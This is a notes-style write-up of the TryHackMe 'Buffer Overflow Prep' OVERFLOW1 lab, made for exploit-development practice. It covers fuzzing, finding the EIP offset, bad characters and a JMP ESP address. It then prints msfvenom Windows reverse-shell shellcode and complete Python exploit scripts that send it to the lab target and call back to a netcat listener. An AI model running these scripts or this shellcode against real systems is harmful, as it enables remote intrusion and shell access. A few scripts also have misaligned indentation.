Buffer Overflow Prep - OverFlow1- TryHackMe

This is a write-up for Buffer Overflow Prep room by Tib3rius on Try Hack Me in notes style format.


Useful Links
===========

https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
https://tryhackme.com/room/bufferoverflowprep


Fuzzing with long input Strings
=========================
⇒ python3 -c 'print ("A" * 5000)' ⇒ Generate lots of As
⇒ Run oscp.exe in Immunity Debugger on the target
⇒ Connect with netcat and send these A's to target : OVERFLOW1 AAAA....5000 times
⇒ OSCP.exe crashes indicated we can exploit this using Buffer Overflow.

MSF Pattern create
================
⇒ msf-pattern_create -l 5000
⇒ send over to the target exe via nc session only.

Mona Config
===========
⇒ !mona config -set workingfolder c:\mona\%p    ⇒ Run this in Immunity

Finding Offset
===========
⇒ In Immunity Debugger note the EIP after sending the pattern and crashing the exe.
    

⇒ msf-pattern_offset -l 5000 -q 6F43396E <====EIP

    Offset is at 1978.

⇒ Fuzz again with 1978 A's and 4 B's
    • python3 -c 'print ("A" * 1978 + "B" * 4)'

    • So we see EIP is filled with four B's. We found the exact sweet spot.

⇒ Python 3 script to test the same:
    import socket
    import sys
    message = b"OVERFLOW1 " #Notice the space in the end
    payload = message + b"A" * 1978 + b"B" * 4

    try:
        print("Sending payload...")
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('10.10.194.7',1337))
        s.recv(1024)
        s.send(payload + b'\r\n')
        s.recv(1024)
        s.close
except:
        print("Cannot connect to server")
        sys.exit()

Finding Bad Characters
===================
⇒ !mona bytearray -b "\x00" ⇒ Run this in Immunity to generate badchars byte array
⇒ https://github.com/mrinalpande/scripts/blob/master/python/badchars can also be used for bad chars
    • Updated script

    import socket 
    import sys
    message = b"OVERFLOW1 " #Notice the space in the end

    badchars = ( b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
                         b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
                         b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
                         b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
                         b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
                         b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
                         b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
                         b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
                         b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
                         b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
                         b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
                         b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
                         b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
                         b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
                         b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
                         b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

    payload = message + b"A" * 1978 + b"B" * 4 + badchars #Bad chars in the end
    
    try:
        print("Sending payload...")
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('10.10.194.7',1337))
        s.recv(1024)
        s.send(payload + b'\r\n')
        s.recv(1024)
        s.close

    except:
        print("Cannot connect to server")
        sys.exit()

• In Immunity Debugger Right Click ESP and "Follow in Dump" and any missing and blurred character that was send out in the above script
    

• So bad char in this example are \x00\x07\x2e\xa0 (\x00\x07\x08\x2e\x2f\xa0\xa1(Remember that badchars can affect the next byte as well))
• Also Mona can be used to find bad chars, run this in Immunity:
    ◇  !mona compare -f C:\mona\oscp\bytearray.bin -a 019DFA30 (<==ESP)


Finding Jump Point
===============
⇒ First find protection etc using Mona
    • !mona modules

• Look for “False” across all the columns
• 2 in this case essfunc.dll and oscp.exe
• Target the dll first to find the find the Jump point

⇒ Finding Jump point ⇒ Return add to jump to, to execute Shell Code
    • !mona find -s "xff\xe4" -m essfunc #JMP ESP

• Go from top to bottom, pick the first one
• Take the Address from the first Jump
• 0x625011af ⇒ Write it in reverse order
    • \xaf\x11\x50\x62
• Other method using mona only:
    ◇ !mona jmp -r esp -cpb "\x00\x07\x2e\xa0" (⇐ Bad chars)
        ▪ Take the address from the Output and put that also in reverse order as shown above.
• Update the script as:
    import socket
    import sys

    message = b"OVERFLOW1 " #Notice the space in the end
    ret = b"\xaf\x11\x50\x62" #This will replace the B's which were at EIP
    payload = message + b"A" * 1978 + ret

    try:
        print("Sending payload...")
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('10.10.194.7',1337))
        s.recv(1024)
        s.send(payload + b'\r\n')
        s.recv(1024)
        s.close

    except:
        print("Cannot connect to server")
sys.exit()

• Set Breakpoint at 0x625011af after opening the exe in Immunity.

• Use F2 to set up the BP and run program.

• Run the above exploit script
  We hit the Break Point and EIP is pointing to our Jump Point - 0x625011af which we wanted as shown:
 
Generate Shell Code
================
⇒ msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=9999 EXITFUNC=thread -b "\x00" -f py
⇒ msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=9999 EXITFUNC=thread -b "\x00" -f c
    • -p = payload
    • LHOST = our local ip
    • LPORT = our local port to get shell back
    • -b = Bad characters to avoid
    • -f = Output format e.g. C or Python

⇒ In our case, let's use the following:
    • msfvenom -p windows/shell_reverse_tcp LHOST=10.8.98.192 LPORT=9999 EXITFUNC=thread -b "\x00\x07\x2e\xa0 " -f c
    • [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
        [-] No arch selected, selecting arch: x86 from the payload
        Found 11 compatible encoders
        Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
        x86/shikata_ga_nai succeeded with size 351 (iteration=0)
        x86/shikata_ga_nai chosen with final size 351
        Payload size: 351 bytes
        Final size of c file: 1500 bytes
        unsigned char buf[] =
        "\xda\xc6\xb8\x92\xf3\x5c\x06\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
        "\x52\x83\xc3\x04\x31\x43\x13\x03\xd1\xe0\xbe\xf3\x29\xee\xbd"
        "\xfc\xd1\xef\xa1\x75\x34\xde\xe1\xe2\x3d\x71\xd2\x61\x13\x7e"
        "\x99\x24\x87\xf5\xef\xe0\xa8\xbe\x5a\xd7\x87\x3f\xf6\x2b\x86"
        "\xc3\x05\x78\x68\xfd\xc5\x8d\x69\x3a\x3b\x7f\x3b\x93\x37\xd2"
        "\xab\x90\x02\xef\x40\xea\x83\x77\xb5\xbb\xa2\x56\x68\xb7\xfc"
        "\x78\x8b\x14\x75\x31\x93\x79\xb0\x8b\x28\x49\x4e\x0a\xf8\x83"
        "\xaf\xa1\xc5\x2b\x42\xbb\x02\x8b\xbd\xce\x7a\xef\x40\xc9\xb9"
        "\x8d\x9e\x5c\x59\x35\x54\xc6\x85\xc7\xb9\x91\x4e\xcb\x76\xd5"
        "\x08\xc8\x89\x3a\x23\xf4\x02\xbd\xe3\x7c\x50\x9a\x27\x24\x02"
        "\x83\x7e\x80\xe5\xbc\x60\x6b\x59\x19\xeb\x86\x8e\x10\xb6\xce"
        "\x63\x19\x48\x0f\xec\x2a\x3b\x3d\xb3\x80\xd3\x0d\x3c\x0f\x24"
        "\x71\x17\xf7\xba\x8c\x98\x08\x93\x4a\xcc\x58\x8b\x7b\x6d\x33"
        "\x4b\x83\xb8\x94\x1b\x2b\x13\x55\xcb\x8b\xc3\x3d\x01\x04\x3b"
        "\x5d\x2a\xce\x54\xf4\xd1\x99\x50\x01\xbb\x99\x0d\x13\x3b\x3d"
        "\xc1\x9a\xdd\x2b\xcd\xca\x76\xc4\x74\x57\x0c\x75\x78\x4d\x69"
        "\xb5\xf2\x62\x8e\x78\xf3\x0f\x9c\xed\xf3\x45\xfe\xb8\x0c\x70"
        "\x96\x27\x9e\x1f\x66\x21\x83\xb7\x31\x66\x75\xce\xd7\x9a\x2c"
        "\x78\xc5\x66\xa8\x43\x4d\xbd\x09\x4d\x4c\x30\x35\x69\x5e\x8c"
        "\xb6\x35\x0a\x40\xe1\xe3\xe4\x26\x5b\x42\x5e\xf1\x30\x0c\x36"
        "\x84\x7a\x8f\x40\x89\x56\x79\xac\x38\x0f\x3c\xd3\xf5\xc7\xc8"
        "\xac\xeb\x77\x36\x67\xa8\x98\xd5\xad\xc5\x30\x40\x24\x64\x5d"
        "\x73\x93\xab\x58\xf0\x11\x54\x9f\xe8\x50\x51\xdb\xae\x89\x2b"
        "\x74\x5b\xad\x98\x75\x4e";

⇒ Our Script will become:
    import socket
    import sys

    message = b"OVERFLOW1 " #Notice the space in the end

    shell_code = (b"\xda\xc6\xb8\x92\xf3\x5c\x06\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
                           b"\x52\x83\xc3\x04\x31\x43\x13\x03\xd1\xe0\xbe\xf3\x29\xee\xbd"
                           b"\xfc\xd1\xef\xa1\x75\x34\xde\xe1\xe2\x3d\x71\xd2\x61\x13\x7e"
                           b"\x99\x24\x87\xf5\xef\xe0\xa8\xbe\x5a\xd7\x87\x3f\xf6\x2b\x86"
                           b"\xc3\x05\x78\x68\xfd\xc5\x8d\x69\x3a\x3b\x7f\x3b\x93\x37\xd2"
                           b"\xab\x90\x02\xef\x40\xea\x83\x77\xb5\xbb\xa2\x56\x68\xb7\xfc"
                           b"\x78\x8b\x14\x75\x31\x93\x79\xb0\x8b\x28\x49\x4e\x0a\xf8\x83"
                           b"\xaf\xa1\xc5\x2b\x42\xbb\x02\x8b\xbd\xce\x7a\xef\x40\xc9\xb9"
                           b"\x8d\x9e\x5c\x59\x35\x54\xc6\x85\xc7\xb9\x91\x4e\xcb\x76\xd5"
                           b"\x08\xc8\x89\x3a\x23\xf4\x02\xbd\xe3\x7c\x50\x9a\x27\x24\x02"
                           b"\x83\x7e\x80\xe5\xbc\x60\x6b\x59\x19\xeb\x86\x8e\x10\xb6\xce"
                           b"\x63\x19\x48\x0f\xec\x2a\x3b\x3d\xb3\x80\xd3\x0d\x3c\x0f\x24"
                           b"\x71\x17\xf7\xba\x8c\x98\x08\x93\x4a\xcc\x58\x8b\x7b\x6d\x33"
                           b"\x4b\x83\xb8\x94\x1b\x2b\x13\x55\xcb\x8b\xc3\x3d\x01\x04\x3b"
                           b"\x5d\x2a\xce\x54\xf4\xd1\x99\x50\x01\xbb\x99\x0d\x13\x3b\x3d"
                           b"\xc1\x9a\xdd\x2b\xcd\xca\x76\xc4\x74\x57\x0c\x75\x78\x4d\x69"
                           b"\xb5\xf2\x62\x8e\x78\xf3\x0f\x9c\xed\xf3\x45\xfe\xb8\x0c\x70"
                           b"\x96\x27\x9e\x1f\x66\x21\x83\xb7\x31\x66\x75\xce\xd7\x9a\x2c"
                           b"\x78\xc5\x66\xa8\x43\x4d\xbd\x09\x4d\x4c\x30\x35\x69\x5e\x8c"
                           b"\xb6\x35\x0a\x40\xe1\xe3\xe4\x26\x5b\x42\x5e\xf1\x30\x0c\x36"
                           b"\x84\x7a\x8f\x40\x89\x56\x79\xac\x38\x0f\x3c\xd3\xf5\xc7\xc8"
                           b"\xac\xeb\x77\x36\x67\xa8\x98\xd5\xad\xc5\x30\x40\x24\x64\x5d"
                           b"\x73\x93\xab\x58\xf0\x11\x54\x9f\xe8\x50\x51\xdb\xae\x89\x2b"
                           b"\x74\x5b\xad\x98\x75\x4e")

    ret = b"\xaf\x11\x50\x62" #This will replace the B's which were at EIP

    payload = message + b"A" * 1978 + ret + b"\x90" * 32 #Add NOPs \x90

    try:
        print("Sending payload...")
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('10.10.194.7',1337))
        s.recv(1024)
        s.send(payload + shell_code + b'\r\n')
        s.recv(1024)
        s.close

    except:
        print("Cannot connect to server")
        sys.exit()

    •The total payload which we are sending is OVERFLOW 1 + AAAA's + JUMP ADDR + NOPs + REVERSE SHELL CODE + \r\n

    • Start a netcat listener ⇒ nc -nlvp 9999

    • Run the exploit after running the exe on target and we get the Reverse Shell :)    



    























Comments

Post a Comment

Popular Posts